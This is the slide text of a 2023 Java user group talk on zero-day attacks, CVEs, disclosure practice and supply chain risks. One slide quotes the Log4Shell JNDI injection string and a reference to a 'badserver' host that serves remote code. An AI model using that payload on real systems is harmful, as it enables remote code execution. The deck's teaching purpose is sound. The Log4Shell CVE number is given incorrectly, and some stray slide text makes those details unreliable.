Presentation for the Jacksonville Java User Group on August 16, 2023. Presenters: Theresa Mammarella and Kadi Grigg.

1. THE UNFOLDING OF A ZERO DAY
ATTACK
CVE 101
@t_mammarella @kadigrigg

2. THERESA
MAMMARELLA
Software Engineer @ IBM
Eclipse OpenJ9 JVM
Open source developer, community
member and speaker
KADI
MCKEAN
Developer Advocate at Endor Labs
Contributor to It's 5:05 pm
Podcaster
@t_mammarella @kadigrigg

3. $8 TRILLION
In 2023, the global annual cost of cyber crime is
predicted to top
Source: Security Intelligence

4. IF CYBERCRIME WAS A
COUNTRY (BY GDP)
China: $14.72 Tr.
Cybercrime: $8.0 Tr.
Japan: $5.06 Tr.
Germany: $3.85 Tr.
United States: $20.89 Tr.
Canada: $1.64 Tr.
Italy: $1.89 Tr.
France: $2.63 Tr.
India: $2.66 Tr.
United Kingdom: $2.67 Tr.
Source: globalpeoservices.com/top-15-countries-by-gdp-in-2022

5. AGENDA
1 SECURITY BASICS
2 VULNERABILITY
TRACKING
3 DISCLOSURE PROCESS
4 SECURITY PRACTICES
FOR DEVELOPERS

6. THE BASICS
Vulnerability
Threat
Risk

7. THE BASICS
Vulnerability
Threat
Risk
x

8. COMMON VULNERABILITIES AND
EXPOSURES (CVES)
Description
Year
ID
References

9. NATIONAL VULNERABILITY
DATABASE

10. CVSS SCORE
METRICS

13. STORY #1

14. SO WHAT IS THE BEST
WAY TO TALK ABOUT
VULNERABILITIES?
Private disclosure
Coordinated (responsible)
disclosure
Full (Public) disclosure

15. HOW DO I DISCLOSE A VULNERABILITY IN A
COORDINATED OR PRIVATE WAY?
Company Website
SECURITY.md
Security files on servers
Github private vulnerability
reporting

16. ZERO DAY
VULNERABILITY
Security bug or flaw
which is either
unknown to the vendor
does not have an official
patch.

17. STORY #2

18. The Zero Day Window is Closing
Source: Adapted from IBM X-Force / Analysis by Gartner Research (September 2016)
Year of Date Reported
2006 2007 2008 2009 2010 2011 2012 2013 2104 2015
10
20
30
40
50
0
A
v
e
r
a
g
e
D
a
y
s
f
r
o
m
P
u
b
l
i
c
D
i
s
c
l
o
s
u
r
e
t
o
E
x
p
l
o
i
t
Average
45
15
2017 2019 2021
Struts2

19. ${jndi:ldap://ldap.dev:1389/a}
Reference ref = new
Reference(“https://badserver,com");
LOG4J
REMOTE CODE
LOADING: A MAJOR
WEAKNESS?
Remember this?
System Loader
JDNI Loader
All the bad code you want
http://badserver.com

20. STORY #3:
CVE-2021-4428 AKA
LOG4SHELL
Coordinated
disclosure
Incomplete fix
More CVE's follow

21. WHAT'S THE DIFFERENCE BETWEEN THESE LINES
OF CODE?

22. STORY #4
CVE-2022-3786 AND CVE-2022-3602

23. MOST OF THESE STORIES
ARE UNTOLD
Jeremy Long, founder of the
OWASP Dependency Check
project speculates that
"only 25% of organizations
report vulnerabilities to
users, and only 10% of
vulnerabilities are reported
as Common Vulnerabilities
exposure (CVE)."
Sonatype State of the Software Supply Chain Report 2019

24. Security Practices for
Developers

25. INSIDER THREAT
The potential for an insider to use their authorized access or understand of an
organization to harm that organization
When an engineer is compromised by outside influence or dissatisfaction
When an engineer is poorly trained
When engineers put backdoors into a product
When remote development systems are not secured or when protections are
removed
When accounts and credentials for terminated or inactive personnel remain
available.
Source: media.defense.gov/2022/Sep/01/2003068942/-1/-1/0/ESF_SECURING_THE_SOFTWARE_SUPPLY_CHAIN_DEVELOPERS.PDF

26. OUTNUMBERED SECURITY STAFF LEAVES
SOFTWARE VULNERABLE
AppSec Developers

27. Source: testbytes.net/blog/what-is-a-software-bug

28. Security
Champions
ORGANIZATIONAL CHANGES
AppSec Developers

31. Credit: Eddie Knight, Sonatype
THE
MANTRA
01
Does this touch the internet?
If a feature touches the internet, we need to
ensure end-to-end security from the supplier
to the consumer
02
Does this take untrusted input?
If a feature takes untrusted input, we need to
validate it's integrity before use
03
Does this handle sensitive data?
If a feature handles sensitive data, we must pay
special care to encryption, handling, and storage.

32. HOW FAST IS YOUR
RELEASE PROCESS?
Sonatype: State of the Software Supply Chain

33. OPEN SOURCE
DEPENDENCY
MANAGEMENT
Dependencies
Dev Tools
Applications

34. IT'S OPEN SEASON ON OPEN SOURCE PROJECTS
90%
of an application is
open source components
*(Sonatype: State of the Software Supply Chain)
Goal: Add malware and vulnerabilities at 'source'

35. org.leftpad
vs
org.leftpadd
A lookalike domain,
dependency with one
or two wrong or
different characters
TYPES OF SUPPLY CHAIN ATTACKS
Typosquatting
Open Source
Repo Attacks
Build Tool
Attacks
Dependency
Confusion
Attempts to get
malware or
weaknesses added into
dependency source via
social or tools
Attempts to get
malware into the tools
that are used to
produce
dependencies
Attempts to get a
Different version added
into a binary repository
Often “latest”
com.foo @ v1
com.foo @ v99999
my.internal@v1

37. LOOKING
THROUGH THE
NOISE

38. Project Security

39. Maybe - tools like OpenSSF
Scorecard can help
Fauget University
Graduated in Web Design
WHO CAN YOU TRUST?
Third Party Projects
Open Source Repositories
Not usually
NPM and PyPI are common to supply
chain attacks
Maven Central is better, namespaces and
user validation help prevent attacks
Scanning Tools
Software Composition Analysis
Can be helpful in discovering known
vulnerabilities or even discovering
unexpected binaries
Some false positives
Who is Responsible?
YOU

40. RECAP
Vulnerability x Threat = Risk
CVE’s, CVSS, disclosure process
The Mantra/OWASP Top 10
Dependency management
Development considerations

42. @t_mammarella
tmammarella
THANK YOU
JACSKONVILLE
JUG
Linux Foundation free course
OWASP Webgoat
Foojay security posts
Endor Labs Top 10 OSS Risks Report
Developing Secure Software
https://training.linuxfoundation.org/training/de
veloping-secure-software-lfd121/
Hands on with the OWASP Top 10
https://owasp.org/www-project-webgoat/
https://foojay.io/today/category/security/
https://www.endorlabs.com/top-10-open-
source-risks
@kadigrigg
kadi-grigg
its505pm